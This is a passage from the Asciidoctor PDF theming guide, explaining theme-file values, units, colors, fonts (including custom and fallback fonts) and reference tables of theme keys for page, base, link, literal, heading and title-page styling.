values.\n\n[source,yaml]\n----\nconum:\n line-height: 4 \/ 3\n----\n\nVariables may be used in place of numbers anywhere in the expression:\n\n[source,yaml]\n----\nbase:\n font-size: 12\n font-size-large: $base-font-size * 1.25\n----\n\nValues used in a math expression are automatically coerced to a float value before the operation.\nIf the result of the expression is an integer, the value is coerced to an integer afterwards.\n\nIMPORTANT: Numeric values less than 1 must have a 0 before the decimal point (e.g., 0.85).\n\nThe theme language also supports several functions for rounding the result of a math expression.\nThe following functions may be used if they surround the whole value or expression for a key.\n\nround(...):: Rounds the number to the nearest half integer.\nfloor(...):: Rounds the number down to the previous integer.\nceil(...):: Rounds the number up to the next integer.\n\nYou might use these functions in font size calculations so that you get more exact values.\n\n[source,yaml]\n----\nbase:\n font-size: 12.5\n font-size-large: ceil($base-font-size * 1.25)\n----\n\n=== Measurement Units\n\nSeveral of the keys require a value in points (pt), the unit of measure for the PDF canvas.\nA point is defined as 1\/72 of an inch.\nIf you specify a number without any units, the unit defaults to pt.\n\nHowever, we humans like to think in real world units like inches (in), centimeters (cm), or millimeters (mm).\nYou can let the theme do this conversion for you automatically by adding a unit notation next to any number.\n\nThe following units are supported:\n\n[width=25%]\n|===\n|Unit |Suffix\n\n|Centimeter\n|cm\n\n|Inch\n|in\n\n|Millimeter\n|mm\n\n|Percentage^[1]^\n|%, vw, or vh\n\n|Points\n|pt (default)\n|===\n\n. 
A percentage with the % unit is calculated relative to the width or height of the content area.\nViewport-relative percentages (vw or vh units) are calculated as a percentage of the page width or height, respectively.\nCurrently, percentage units can only be used for placing elements on the title page or for setting the width of a block image.\n\nHere's an example of how you can use inches to define the page margins:\n\n[source,yaml]\n----\npage:\n margin: [0.75in, 1in, 0.75in, 1in]\n----\n\nThe order of elements in a measurement array is the same as it is in CSS:\n\n. top\n. right\n. bottom\n. left\n\n=== Alignments\n\nThe align subkey is used to align text and images within the parent container.\n\n==== Text Alignments\n\nText can be aligned as follows:\n\n* left\n* center\n* right\n* justify (stretched to each edge)\n\n==== Image Alignments\n\nImages can be aligned as follows:\n\n* left\n* center\n* right\n\n=== Font Styles\n\nIn most cases, wherever you can specify a custom font family, you can also specify a font style.\nThese two settings are combined to locate the font to use.\n\nThe following font styles are recognized:\n\n* normal (no style)\n* italic\n* bold\n* bold_italic\n\n=== Text Transforms\n\nIn many places where font properties can be specified, a case transformation can be applied to the text.\nThe following transforms are recognized:\n\n* uppercase\n* lowercase\n* none (clears an inherited value)
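\n\nFor example, here's a minimal sketch that renders all headings in uppercase (assuming your theme defines the heading category, as the default theme does):\n\n[source,yaml]\n----\nheading:\n  text-transform: uppercase\n----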
\n\n[CAUTION#transform-unicode-letters]\n====\nSince Ruby 2.4, Ruby has built-in support for transforming the case of any letter defined by Unicode.\n\nIf you're using Ruby < 2.4, and the text you want to transform contains characters beyond the Basic Latin character set (e.g., an accented character), you must install either the `activesupport` or the `unicode` gem in order for those characters to be transformed.\n\n $ gem install activesupport\n\nor\n\n $ gem install unicode\n====\n\n\/\/ Additional transforms, such as capitalize, may be added in the future.\n\n=== Colors\n\nThe theme language supports color values in four formats:\n\nHex:: A string of 3 or 6 characters with an optional leading `#`, optional surrounding quotes, or both.\nRGB:: An array of numeric values ranging from 0 to 255.\nCMYK:: An array of numeric values ranging from 0 to 1 or from 0% to 100%.\nTransparent:: The special value `transparent` indicates that a color should not be used.\n\n==== Hex\n\nThe hex color value is likely most familiar to web developers.\nThe value must be either 3 or 6 characters (case insensitive) with an optional leading hash (`#`), optional surrounding quotes, or both.\n\nTo align with CSS, you may add a `+#+` in front of the hex color value.\nA YAML preprocessor is used to ensure the value is not treated as a comment as would normally be the case in YAML.\nThat same preprocessor will also coerce a primitive value to a string if `color` is the name of the last segment in the key (e.g., `font-color`).\nThis avoids the problem of 000 becoming 0 (and similar implicit conversions) when the theme file is parsed.\n\nYou also may put quotes around the CSS-style hex value to make it friendly to a YAML editor or validation tool.\nIn this case, the leading `+#+` on a hex value is entirely optional.\n\nRegardless, we recommend that you always use either a leading `+#+` or surrounding quotes (or both) to prevent YAML from mangling the value.\n\nThe following are all equivalent values for the color red:\n\n[cols=\"8*m\"]\n|===\n|#ff0000\n|#FF0000\n|'ff0000'\n|'FF0000'\n|#f00\n|#F00\n|'f00'\n|'F00'\n|===\n\nHere's how a hex color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font-color: #ff0000\n----\n\n==== RGB\n\nAn RGB array value must be three numbers ranging from 0 to 255.\nThe values must be separated by commas and be surrounded by square brackets.\n\nNOTE: An RGB array is automatically converted to a hex string internally, so there's no difference between ff0000 and [255, 0, 0].\n\nHere's how to specify the color red in RGB:\n\n* [255, 0, 0]\n\nHere's how an RGB color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font-color: [255, 0, 0]\n----\n\n==== CMYK\n\nA CMYK array value must be four numbers ranging from 0 to 1 or from 0% to 100%.\nThe values must be separated by commas and be surrounded by square brackets.\n\nUnlike the RGB array, the CMYK array _is not_ converted to a hex string internally.\nPDF has native support for CMYK colors, so you can preserve the original color values in the final PDF.\n\nHere's how to specify the color red in CMYK:\n\n* [0, 0.99, 1, 0]\n* [0, 99%, 100%, 0]\n\nHere's how a CMYK color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font-color: [0, 0.99, 1, 0]\n----\n\n==== Transparent\n\nIt's possible to specify no color by assigning the special value `transparent`, as shown here:\n\n[source,yaml]\n----\ntable:\n background-color: transparent\n----\n\n=== Images\n\nAn image is specified either as a bare image path or as an inline image macro as found in the AsciiDoc syntax.\nImages in the theme file are currently resolved relative to the value of the `pdf-themesdir` attribute.\n(If `pdf-theme` is a path that ends in `.yml`, and `pdf-themesdir` is not set, then the images are resolved relative to the directory of the path specified by `pdf-theme`).\n\nThe following image types (and corresponding file extensions) are supported:\n\n* PNG (.png)\n* JPEG (.jpg)\n* SVG (.svg)\n\nCAUTION: The GIF format (.gif) and BMP format (.bmp) are not supported unless you're using prawn-gmagick.\nSee https:\/\/github.com\/asciidoctor\/asciidoctor-pdf#supporting-additional-image-file-formats[support for additional image file formats] for details.\n\nHere's how an image is specified in the theme file as a bare image path:\n\n[source,yaml]\n----\ntitle-page:\n background-image: title-cover.png\n----\n\nHere's how the image is specified using the inline image macro:\n\n[source,yaml]\n----\ntitle-page:\n background-image: image:title-cover.png[]\n----\n\nIn either case, the image is resolved relative to the value of the `pdf-themesdir` attribute, as previously described.\n\nLike in the AsciiDoc syntax, wrapping the value in the image macro allows you to specify other settings, such as `pdfwidth`, `fit`, and\/or `align`.\nFor example:\n\n[source,yaml]\n----\ntitle-page:\n logo-image: image:logo.png[width=250,align=center]\n----\n\n=== Quoted String\n\nSome of the keys accept a quoted string as text content.\nThe final segment of these keys is always named `content`.\n\nA content key accepts a string value.\nIt's usually best to quote the string or use the http:\/\/symfony.com\/doc\/current\/components\/yaml\/yaml_format.html#strings[YAML multi-line string syntax].\n\nText content may be formatted using a subset of inline HTML.\nYou can use the well-known elements such as `<strong>`, `<em>`, `<code>`, `<a>`, `<sub>`, `<sup>`, `<del>`, and `<span>`.\nThe `<span>` element supports the `style` attribute, which you can 
You can also use the `rgb` attribute on the `<color>` element to change the color or the `name` and `size` attributes on the `<font>` element to change the font properties.
If you need to add an underline or strikethrough decoration to the text, you can assign `underline` or `line-through` to the `class` attribute on any aforementioned element.

Here's an example of using formatting in the content of the menu caret:

[source,yaml]
----
menu-caret-content: " <font size=\"1.15em\"><color rgb=\"#b12146\">\u203a</color></font> "
----

NOTE: The string must be double quoted in order to use a Unicode escape code like `\u203a`.

Additionally, normal substitutions are applied to the value of content keys for <<Running Content (Header & Footer),running content>>, so you can use most AsciiDoc inline formatting (e.g., `+*strong*+` or `+{attribute-name}+`) in the values of those keys.

== Fonts

You can select from <<built-in-afm-fonts,built-in PDF fonts>>, <<bundled-fonts,fonts bundled with Asciidoctor PDF>> or <<custom-fonts,custom fonts>> loaded from TrueType font (TTF) files.
If you want to use custom fonts, you must first declare them in your theme file.

IMPORTANT: Asciidoctor has no trouble working with Unicode.
In fact, it prefers Unicode and considers the entire range.
However, once you convert to PDF, you have to meet the font requirements of PDF in order to preserve Unicode characters.
That means you need to provide a font (at least a fallback font) that contains glyphs for all the characters you want to use.
If you don't, you may notice that characters are missing.
There's nothing Asciidoctor can do to convince PDF to work with extended characters without the right fonts in play.

=== Built-In (AFM) Fonts

The names of the built-in fonts (for general-purpose text) are as follows:

[width=33.33%]
|===
|Font Name |Font Family

|Helvetica
|sans-serif

|Times-Roman
|serif

|Courier
|monospace
|===

Using a built-in font requires no additional files.
You can use the key anywhere a `font-family` property is accepted in the theme file.
For example:

[source,yaml]
----
base:
  font-family: Times-Roman
----

However, when you use a built-in font, the characters you can use in your document are limited to the characters in the WINANSI (http://en.wikipedia.org/wiki/Windows-1252[Windows-1252]) code set.
WINANSI includes most of the characters needed for writing in Western languages (English, French, Spanish, etc.).
For anything outside of that, PDF is BYOF (Bring Your Own Font).

Even though the built-in fonts require the content to be encoded in WINANSI, _you still type your AsciiDoc document in UTF-8_.
Asciidoctor PDF encodes the content into WINANSI when building the PDF.

WARNING: Built-in (AFM) fonts do not use the <<fallback-fonts,fallback fonts>>.
In order for the fallback font to kick in, you must be using a TrueType font.

.WINANSI Encoding Behavior
****
When using the built-in PDF (AFM) fonts on a block of content in your AsciiDoc document, any character that cannot be encoded to WINANSI is replaced with a logical "`not`" glyph (`¬`) and you'll see the following warning in your console:

 The following text could not be fully converted to the Windows-1252 character set:
 | <string with unknown glyph>

This behavior differs from the default behavior in Prawn, which is to simply crash.

You'll often see this warning if you're using callouts in your document and you haven't specified a TrueType font in your theme.
To prevent this warning, you need to specify a TrueType font.

When using a TrueType font, you will get no warning for a missing glyph.
That's a consequence of how Prawn works and is outside of Asciidoctor PDF's control.

For more information about how Prawn handles character encodings for built-in fonts, see https://github.com/prawnpdf/prawn/blob/master/CHANGELOG.md#vastly-improved-handling-of-encodings-for-pdf-built-in-afm-fonts[this note in the Prawn CHANGELOG].
****

=== Bundled Fonts

Asciidoctor PDF bundles several fonts that are used by the default theme.
You can also use these fonts in your custom theme by simply declaring them.
These fonts provide more characters than the built-in PDF fonts, but still only a subset of UTF-8 (to reduce the size of the gem).

The family names of the fonts bundled with Asciidoctor PDF are as follows:

http://www.google.com/get/noto/#/family/noto-serif[Noto Serif]::
A serif font that can be styled as normal, italic, bold or bold_italic.

http://mplus-fonts.osdn.jp/mplus-outline-fonts/design/index-en.html#mplus_1mn[M+ 1mn]::
A monospaced font that maps different thicknesses to the styles normal, italic, bold and bold_italic.
Also provides the circled numbers used in callouts.

http://mplus-fonts.osdn.jp/mplus-outline-fonts/design/index-en.html#mplus_1p[M+ 1p Fallback]::
A sans-serif font that provides a very complete set of Unicode glyphs.
Cannot be styled as italic, bold or bold_italic.
Used as the fallback font in the `default-with-fallback-font` theme.

CAUTION: At the time of this writing, you cannot use the bundled fonts if you change the value of the `pdf-fontsdir` attribute (and thus define your own custom fonts).
This limitation may be lifted in the future.

=== Custom Fonts

The limited character set of WINANSI, or the bland look of the built-in fonts, may motivate you to load your own font.
Custom fonts can enhance the look of your PDF theme substantially.

To start, find the TTF file collection for the font you want to use.
A collection typically consists of all four font styles:

* normal
* italic
* bold
* bold_italic

You'll need all four styles to support AsciiDoc content properly.
_Asciidoctor PDF cannot italicize a font dynamically like a browser can, so the italic styles are required._

In order for a third-party font to work properly with Prawn (and hence Asciidoctor PDF), several modifications are required.
See <<Prepare a Custom Font>> to learn how to prepare your font for use with Asciidoctor PDF.

Once you've obtained the TTF files, put them in the directory inside your project where you want to store the fonts.
It's recommended that you name them consistently so it's easier to type the names in the theme file.

Let's assume the name of the font is https://github.com/google/roboto/tree/master/out/RobotoTTF[Roboto].
Rename the files as follows:

* roboto-normal.ttf (_originally Roboto-Regular.ttf_)
* roboto-italic.ttf (_originally Roboto-Italic.ttf_)
* roboto-bold.ttf (_originally Roboto-Bold.ttf_)
* roboto-bold_italic.ttf (_originally Roboto-BoldItalic.ttf_)

Next, declare the font under the `font-catalog` key at the top of your theme file, giving it a unique key (e.g., `Roboto`).

[source,yaml]
----
font:
  catalog:
    Roboto:
      normal: roboto-normal.ttf
      italic: roboto-italic.ttf
      bold: roboto-bold.ttf
      bold_italic: roboto-bold_italic.ttf
----

You can use the key that you assign to the font in the font catalog anywhere the `font-family` property is accepted in the theme file.
For example, to use the Roboto font for all headings, use:

[source,yaml]
----
heading:
  font-family: Roboto
----

When you execute Asciidoctor PDF, specify the directory where the fonts reside using the `pdf-fontsdir` attribute:

 $ asciidoctor-pdf -a pdf-theme=basic-theme.yml -a pdf-fontsdir=path/to/fonts document.adoc

WARNING: Currently, all fonts referenced by the theme need to be present in the directory specified by the `pdf-fontsdir` attribute.

TIP: When Asciidoctor PDF creates the PDF, it only embeds the glyphs from the font that are needed to render the characters present in the document.
Effectively, it subsets the font.
While that saves space taken up by the generated PDF, you may still be storing the full font in your source repository.
To minimize the size of the source font, you can use {url-fontforge}[FontForge] to subset the font ahead of time.
Subsetting a font means removing glyphs you don't plan to use.
Doing so is not a requirement, simply a personal preference.

You can add any number of fonts to the catalog.
Each font must be assigned a unique key, as shown here:

[source,yaml]
----
font:
  catalog:
    Roboto:
      normal: roboto-normal.ttf
      italic: roboto-italic.ttf
      bold: roboto-bold.ttf
      bold_italic: roboto-bold_italic.ttf
    Roboto Light:
      normal: roboto-light-normal.ttf
      italic: roboto-light-italic.ttf
      bold: roboto-light-bold.ttf
      bold_italic: roboto-light-bold_italic.ttf
----

Text in SVGs will use the font catalog from your theme.
We recommend that you match the font key in your theme file to the name of the font seen by the operating system.
This will allow you to use the same font names (aka families) in both your graphics program and Asciidoctor PDF, thus making them portable.

=== Fallback Fonts

If a TrueType font is missing a character needed to render the document, such as a special symbol, you can have Asciidoctor PDF look for the character in a fallback font.
You only need to specify a single fallback font, typically one that provides a full set of symbols.

IMPORTANT: The fallback font only gets used when the primary font is a TrueType font (i.e., TTF, DFont, TTC).
Any glyph missing from an AFM font is simply replaced with the "`not`" glyph (`¬`).

CAUTION: The `default` theme does not use a fallback font.
However, the built-in `default-with-fallback-font` theme does.
Using the fallback font slows down PDF generation slightly because it has to analyze every single character.
Its use is not recommended for large documents.
Instead, it's best to select primary fonts that have all the characters you need.

Like with other custom fonts, you first need to declare the fallback font.
Let's choose https://github.com/android/platform_frameworks_base/blob/master/data/fonts/DroidSansFallback.ttf[Droid Sans Fallback].
You can map all the styles to a single font file (since bold and italic don't usually make sense for symbols).

[source,yaml]
----
font:
  catalog:
    Roboto:
      normal: roboto-normal.ttf
      italic: roboto-italic.ttf
      bold: roboto-bold.ttf
      bold_italic: roboto-bold_italic.ttf
    DroidSansFallback:
      normal: droid-sans-fallback.ttf
      italic: droid-sans-fallback.ttf
      bold: droid-sans-fallback.ttf
      bold_italic: droid-sans-fallback.ttf
----

Next, add the key name to the `fallbacks` key under the `font-catalog` key.
The `fallbacks` key accepts an array of values, meaning you can specify more than one fallback font.
However, we recommend using a single fallback font, if possible, as shown here:

[source,yaml]
----
font:
  catalog:
    Roboto:
      normal: roboto-normal.ttf
      italic: roboto-italic.ttf
      bold: roboto-bold.ttf
      bold_italic: roboto-bold_italic.ttf
    DroidSansFallback:
      normal: droid-sans-fallback.ttf
      italic: droid-sans-fallback.ttf
      bold: droid-sans-fallback.ttf
      bold_italic: droid-sans-fallback.ttf
  fallbacks:
  - DroidSansFallback
----

TIP: If you are using more than one fallback font, add additional lines to the `fallbacks` key.

Of course, make sure you've configured your theme to use your custom font:

[source,yaml]
----
base:
  font-family: Roboto
----

That's it!
Now you're covered.
If your custom TTF font is missing a glyph, Asciidoctor PDF will look in your fallback font.
You don't need to reference the fallback font anywhere else in your theme file.

== Keys

This section lists all the keys that are available when creating a custom theme.
The keys are organized by category.
Each category represents a common prefix under which the keys are typically nested.

TIP: Keys can be nested wherever an underscore (`_`) or hyphen (`-`) appears in the name.
This nested structure is for organizational purposes only.
All keys are flattened when the theme is loaded (e.g., `align` nested under `base` becomes `base-align`).

The converter uses the values of these keys to control how most elements are arranged and styled in the PDF.
The default values listed in this section get inherited from the https://github.com/asciidoctor/asciidoctor-pdf/blob/master/data/themes/base-theme.yml[base theme].

IMPORTANT: The https://github.com/asciidoctor/asciidoctor-pdf/blob/master/data/themes/default-theme.yml[default theme] has a different set of values which are not shown in this guide.

When creating a theme, all keys are optional.
Required keys are provided by the base theme.
Therefore, you only have to declare keys that you want to override.

[#keys-extends]
=== Extends

A theme can extend another theme using the `extends` key.
For example:

[source,yaml]
----
extends: default
base:
  font-color: #ff0000
----

The `extends` key accepts either a single value or an array of values.
Each value is interpreted as a filename.
If the filename equals `default`, it resolves to the location of the default (built-in) theme.
If the filename is absolute, it's used as is.
If the filename begins with `./`, it's resolved as a theme file relative to the current theme file.
Otherwise, the filename is resolved as a theme file in the normal way (relative to the value of the `pdf-themesdir` attribute).

Currently, the base theme is always loaded first.
Then, the files referenced by the extends key are loaded in order.
Finally, the keys in the current file are loaded.
Each time a theme is loaded, the keys are overlaid onto the keys from the previous theme.
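Putting these resolution rules together, here's a sketch of a theme file that builds on the default theme and then overlays a brand file that lives next to the current theme (the `./brand-theme.yml` filename and color are just illustrations):

[source,yaml]
----
extends:
- default
- ./brand-theme.yml
base:
  font-color: #333333
----

The keys in `./brand-theme.yml` override the default theme, and the keys declared in this file override both.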
[cols="3,4,5l"]
|===
|Key |Value Type |Example

|extends
|String or Array
(default: [])
|extends:
- default
- ./brand-theme.yml
|===

[#keys-role]
=== Role

The keys in the `role` category define custom roles for formatting.
The name of the role is the first subkey level.
The role name may not contain a hyphen or underscore.
The keys under the role are the concrete theming properties.

Here's an example of a role for making text red:

[source,yaml]
----
role:
  red:
    font-color: #ff0000
----

This role can be used as follows:

[source,asciidoc]
----
Error text is shown in [.red]#red#.
----

Currently, custom roles only apply to inline phrases and only support changing the font properties.

The converter provides several predefined roles.
The `big` and `small` roles map the font size to the $base_font_size_large and $base_font_size_small values, respectively.
These two roles can be redefined.
The `underline` and `line-through` roles add the underline and strikethrough decorations, respectively.
These two roles _can't_ be redefined.
The color roles (e.g., `blue`), which you may be familiar with from the HTML converter, are not mapped by default.
You'll need to define these in your theme if you'd like to make use of them when converting to PDF.
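For instance, here's a minimal sketch that recreates the `blue` color role for the PDF (the hex value is just an illustration):

[source,yaml]
----
role:
  blue:
    font-color: '0000FF'
----

With that in place, `[.blue]#text#` in the document is rendered in that color.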
[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-role]*Key Prefix:* <<key-prefix-role,role-<name> >>

|font-color
|<<colors,Color>> +
(default: _inherit_)
|role:
  red:
    font-color: #ff0000

|font-family
|<<fonts,Font family name>> +
(default: Courier)
|role:
  label:
    font-family: M+ 1mn

|font-size
|<<values,Number>> +
(default: _inherit_)
|role:
  large:
    font-size: 12

|font-style
|<<font-styles,Font style>> +
(default: _inherit_)
|role:
  heavy:
    font-style: bold
|===

[#keys-page]
=== Page

The keys in this category control the size, margins and background of each page (i.e., canvas).
We recommend that you define this category before all other categories.

NOTE: The background of the title page can be styled independently of other pages.
See <<Title Page>> for details.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-page]*Key Prefix:* <<key-prefix-page,page>>

|background-color^[1]^
|<<colors,Color>> +
(default: #ffffff)
|page:
  background-color: #fefefe

|background-image^[2]^
|image macro^[3]^ +
(default: _not set_)
|page:
  background-image: image:page-bg.png[]

|background-image-(recto{vbar}verso)^[2]^
|image macro^[3]^ +
(default: _not set_)
|page:
  background-image:
    recto: image:page-bg-recto.png[]
    verso: image:page-bg-verso.png[]

|layout
|portrait {vbar} landscape +
(default: portrait)
|page:
  layout: landscape

|margin
|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +
(default: 36)
|page:
  margin: [0.5in, 0.67in, 1in, 0.67in]

|margin-inner^[4]^
|<<measurement-units,Measurement>> +
(default: 48)
|page:
  margin-inner: 0.75in

|margin-outer^[4]^
|<<measurement-units,Measurement>> +
(default: 24)
|page:
  margin-outer: 0.59in

|size
|https://github.com/prawnpdf/pdf-core/blob/0.6.0/lib/pdf/core/page_geometry.rb#L16-L68[Named size^] {vbar} <<measurement-units,Measurement[width,height]>> +
(default: A4)
|page:
  size: Letter

|numbering-start-at
|title {vbar} toc {vbar} body +
(default: body)
|page:
  numbering-start-at: toc
|===

. To disable the background color for the page, set the value to white (i.e., FFFFFF).
The color keyword `transparent` is not recognized in this context.
. By default, page background images are automatically scaled to fit the bounds of the page (i.e., `fit=contain`) and centered (i.e., `position=center`).
The size of the background image can be controlled using any of the sizing attributes on the image macro (i.e., fit, pdfwidth, scaledwidth, or width).
The position of the background image can be controlled using the `position` attribute.
If the recto (right-hand, odd-numbered pages) or verso (left-hand, even-numbered pages) background is specified, it will be used only for that side.
If you define the keys using the flattened structure (e.g., `page-background-image-recto`), you can also set the default page background image (`page-background-image`), which will then be used as a fallback if a background image isn't specified for a given side.
To disable the background image, use the value `none`.
. Target may be an absolute path or a path relative to the value of the `pdf-themesdir` attribute.
. The margins for `recto` (right-hand, odd-numbered) and `verso` (left-hand, even-numbered) pages are calculated automatically from the margin-inner and margin-outer values.
These margins are used when the value `prepress` is assigned to the `media` document attribute.
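For example, here's a sketch of the flattened form described above, where verso pages get their own background image and all other pages fall back to a shared one (the filenames are just illustrations):

[source,yaml]
----
page:
  background-image: image:page-bg.png[]
  background-image-verso: image:page-bg-verso.png[]
----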
[#keys-base]
=== Base

The keys in this category provide generic theme settings and are often referenced throughout the theme file as variables.
We recommend that you define this category after the page category and before all other categories.

NOTE: While it's common to define additional keys in this category (e.g., `base-border-radius`) to keep your theme DRY, we recommend using <<Custom Variables,custom variables>> instead.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-base]*Key Prefix:* <<key-prefix-base,base>>

|align
|<<text-alignments,Text alignment>> +
(default: left)
|base:
  align: justify

|border-color
|<<colors,Color>> +
(default: #eeeeee)
|base:
  border-color: #eeeeee

// border-radius is variable, not an official key
//|border-radius
//|<<values,Number>>
//|base:
//  border-radius: 4

|border-width
|<<values,Number>> +
(default: 0.5)
|base:
  border-width: 0.5

|font-color
|<<colors,Color>> +
(default: #000000)
|base:
  font-color: #333333

|font-family
|<<fonts,Font family name>> +
(default: Helvetica)
|base:
  font-family: Noto Serif

|font-kerning
|normal {vbar} default +
(default: normal)
|base:
  font-kerning: none

|font-size
|<<values,Number>> +
(default: 12)
|base:
  font-size: 10.5

// font-size-large is a variable, not an official key
//|font-size-large
//|<<values,Number>>
//|base:
//  font-size-large: 13

|font-size-min
|<<values,Number>> +
(default: 9)
|base:
  font-size-min: 6

// font-size-small is a variable, not an official key
//|font-size-small
//|<<values,Number>>
//|base:
//  font-size-small: 9

|font-style
|<<font-styles,Font style>> +
(default: normal)
|base:
  font-style: normal

|text-transform^[1]^
|none +
(default: none)
|base:
  text-transform: none

|line-height-length^[2]^
|<<values,Number>> +
(default: _not set_)
|base:
  line-height-length: 12

|line-height^[2]^
|<<values,Number>> +
(default: 1.15)
|base:
  line-height: >
    $base-line-height-length /
    $base-font-size
|===

. The `text-transform` key cannot be set globally.
Therefore, this key should not be used.
The value of `none` is implicit and is documented here for completeness.
. The `line-height-length` is a pseudo property that's local to the theme.
It's often used for computing the `base-line-height` from the base font size and the desired line height size.
For instance, if you set `base-line-height-length`, you can use `$base-line-height-length / $base-font-size` to set the value of `base-line-height`.

[#keys-vertical-spacing]
=== Vertical Spacing

The keys in this category control the general spacing between elements where a more specific setting is not designated.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

|vertical-spacing
|<<values,Number>> +
(default: 12)
|vertical-spacing: 10
|===

[#keys-link]
=== Link

The keys in this category are used to style hyperlink text.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-link]*Key Prefix:* <<key-prefix-link,link>>

|font-color
|<<colors,Color>> +
(default: #0000ee)
|link:
  font-color: #428bca

|font-family
|<<fonts,Font family name>> +
(default: _inherit_)
|link:
  font-family: Roboto

|font-size
|<<values,Number>> +
(default: _inherit_)
|link:
  font-size: 9

|font-style
|<<font-styles,Font style>> +
(default: _inherit_)
|link:
  font-style: italic

|text-decoration
|none {vbar} underline {vbar} line-through +
(default: none)
|link:
  text-decoration: underline
|===

[#keys-literal]
=== (Inline) Literal

The keys in this category are used for inline monospaced text in prose and table cells.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-literal]*Key Prefix:* <<key-prefix-literal,literal>>

|background-color
|<<colors,Color>> +
(default: _not set_)
|literal:
  background-color: #f5f5f5

|border-color^[1]^
|<<colors,Color>> +
(default: _not set_)
|literal:
  border-color: #cccccc

|border-offset^[2]^
|<<values,Number>> +
(default: 0)
|literal:
  border-offset: 2

|border-radius
|<<values,Number>> +
(default: _not set_)
|literal:
  border-radius: 3

|border-width
|<<values,Number>> +
(default: $base-border-width)
|literal:
  border-width: 0.5

|font-color
|<<colors,Color>> +
(default: _inherit_)
|literal:
  font-color: #b12146

|font-family
|<<fonts,Font family name>> +
(default: Courier)
|literal:
  font-family: M+ 1mn

|font-size
|<<values,Number>> +
(default: _inherit_)
|literal:
  font-size: 12

|font-style
|<<font-styles,Font style>> +
(default: _inherit_)
|literal:
  font-style: bold
|===
. The border is only used if a border color is specified and the border width is not explicitly set to 0.
The border only works properly if the literal phrase does not have nested formatting.
Otherwise, the border will be inherited, producing a less than desirable result.
. The border offset is the amount that the background and border swell around the text.
It does not affect the distance between the formatted phrase and the phrases that surround it.
[#keys-heading]
=== Heading

The keys in this category control the style of most headings, including part titles, chapter titles, section titles, the table of contents title and discrete headings.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-heading]*Key Prefix:* <<key-prefix-heading,heading>>

|align
|<<text-alignments,Text alignment>> +
(default: $base-align)
|heading:
  align: center

|font-color
|<<colors,Color>> +
(default: _inherit_)
|heading:
  font-color: #222222

|font-family
|<<fonts,Font family name>> +
(default: $base-font-family)
|heading:
  font-family: Noto Serif

// NOTE: heading-font-size is overridden by h<n>-font-size in base theme
//|font-size
//|<<values,Number>> +
//(default: $base-font-size)
//|heading:
//  font-size: 18

|font-style
|<<font-styles,Font style>> +
(default: bold)
|heading:
  font-style: bold

|text-transform
|<<text-transforms,Text transform>> +
(default: _inherit_)
|heading:
  text-transform: uppercase

|line-height
|<<values,Number>> +
(default: 1.15)
|heading:
  line-height: 1.2

|margin-top
|<<measurement-units,Measurement>> +
(default: 4)
|heading:
  margin-top: $vertical-spacing * 0.2

|margin-bottom
|<<measurement-units,Measurement>> +
(default: 12)
|heading:
  margin-bottom: 9.6

3+|[#key-prefix-heading-level]*Key Prefix:* <<key-prefix-heading-level,heading-h<n> >>^[1]^

|align
|<<text-alignments,Text alignment>> +
(default: $heading-align)
|heading:
  h2-align: center

|font-color
|<<colors,Color>> +
(default: $heading-font-color)
|heading:
  h2-font-color: [0, 99%, 100%, 0]

|font-family
|<<fonts,Font family name>> +
(default: $heading-font-family)
|heading:
  h4-font-family: Roboto

|font-size^[2]^
|<<values,Number>> +
(default: <1>=24; <2>=18; <3>=16; <4>=14; <5>=12; <6>=10)
|heading:
  h6-font-size: $base-font-size * 1.7

|font-style
|<<font-styles,Font style>> +
(default: $heading-font-style)
|heading:
  h3-font-style: bold_italic

|text-transform
|<<text-transforms,Text transform>> +
(default: $heading-text-transform)
|heading:
  text-transform: lowercase
|===

. `<n>` is a number ranging from 1 to 6, representing each of the six heading levels.
. A font size is assigned to each heading level by the base theme.
If you want the font size of a specific level to be inherited, you must assign the value `null` (or `~` for short).
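For example, here's a sketch that clears the level-specific size assigned by the base theme so level-3 headings inherit the font size instead:

[source,yaml]
----
heading:
  h3-font-size: ~
----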
[#keys-title-page]
=== Title Page

The keys in this category control the style of the title page as well as the arrangement and style of the elements on it.

TIP: The title page can be disabled from the document by setting the `notitle` attribute in the AsciiDoc document header.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-title-page]*Key Prefix:* <<key-prefix-title-page,title-page>>

|align
|<<text-alignments,Text alignment>> +
(default: center)
|title-page:
  align: right

|background-color^[1]^
|<<colors,Color>> +
(default: _inherit_)
|title-page:
  background-color: #eaeaea

|background-image^[2]^
|image macro^[3]^ +
(default: _not set_)
|title-page:
  background-image: image:title.png[]

|font-color
|<<colors,Color>> +
(default: _inherit_)
|title-page:
  font-color: #333333

|font-family
|<<fonts,Font family name>> +
(default: _inherit_)
|title-page:
  font-family: Noto Serif

|font-size
|<<values,Number>> +
(default: _inherit_)
|title-page:
  font-size: 13

|font-style
|<<font-styles,Font style>> +
(default: _inherit_)
|title-page:
  font-style: bold

|text-transform
|<<text-transforms,Text transform>> +
(default: _inherit_)
|title-page:
  text-transform: uppercase

|line-height
|<<values,Number>> +
(default: 1.15)
|title-page:
  line-height: 1

3+|[#key-prefix-title-page-logo]*Key Prefix:* <<key-prefix-title-page-logo,title-page-logo>>

|align
|<<image-alignments,Image alignment>> +
(default: _inherit_)
|title-page:
  logo:
    align: right

|image
|image macro^[3]^ +
(default: _not set_)
|title-page:
  logo:
    image: image:logo.png[pdfwidth=25%]

|top
|Percentage^[4]^ +
(default: 10%)
|title-page:
  logo:
    top: 25%

3+|[#key-prefix-title-page-title]*Key Prefix:* <<key-prefix-title-page-title,title-page-title>>

|font-color
|<<colors,Color>> +
(default: _inherit_)
|title-page:
  title:
    font-color: #999999

|font-family
|<<fonts,Font family name>> +
(default: _inherit_)
|title-page:
  title:
    font-family: Noto Serif

|font-size
|<<values,Number>> +
(default: 18)
|title-page:
  title:
    font-size: $heading-h1-font-size

|font-style
|<<font-styles,Font style>> +
(default: _inherit_)
|title-page:
